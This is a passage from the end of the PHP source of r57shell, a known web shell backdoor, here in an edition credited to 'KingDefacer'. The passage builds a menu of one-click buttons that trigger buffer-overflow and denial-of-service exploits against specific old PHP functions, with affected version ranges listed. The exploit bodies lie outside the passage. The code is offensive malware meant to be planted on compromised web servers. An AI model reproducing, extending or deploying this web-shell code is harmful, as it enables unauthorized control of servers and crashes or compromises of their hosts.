7676echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe);
7677
7678echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe);
7679
7680echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe);
7681
7682echo $te."</td><td valign=top width=25%>".$ts;
7683
7684echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7685
7686echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe);
7687
7688echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe);
7689
7690echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe);
7691
7692echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe);
7693
7694echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe);
7695
7696echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe);
7697
7698echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe);
7699
7700echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe);
7701
7702echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe);
7703
7704echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe);
7705
7706echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe);
7707
7708echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe);
7709
7710echo $te."</td><td valign=top width=25%>".$ts;
7711
7712echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7713
7714echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe);
7715
7716echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe);
7717
7718echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe);
7719
7720echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe);
7721
7722echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe);
7723
7724echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe);
7725
7726echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe);
7727
7728echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe);
7729
7730echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe);
7731
7732echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe);
7733
7734echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe);
7735
7736echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe);
7737
7738echo $te."</td><td valign=top width=25%>".$ts;
7739
7740echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7741
7742echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe);
7743
7744echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe);
7745
7746/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/
7747
7748echo $te."</td></tr></div></table>";
7749
7750echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell | version ".$version." | <a href=http://www.c99php.com/>r57shell v.1.42 Edited By KingDefacer</a> | Generation time: ".round(getmicrotime()-starttime,4)." ]---o</b></font></div></td></tr></table>";
7751
7752echo '</body></html>';
7753
7754?>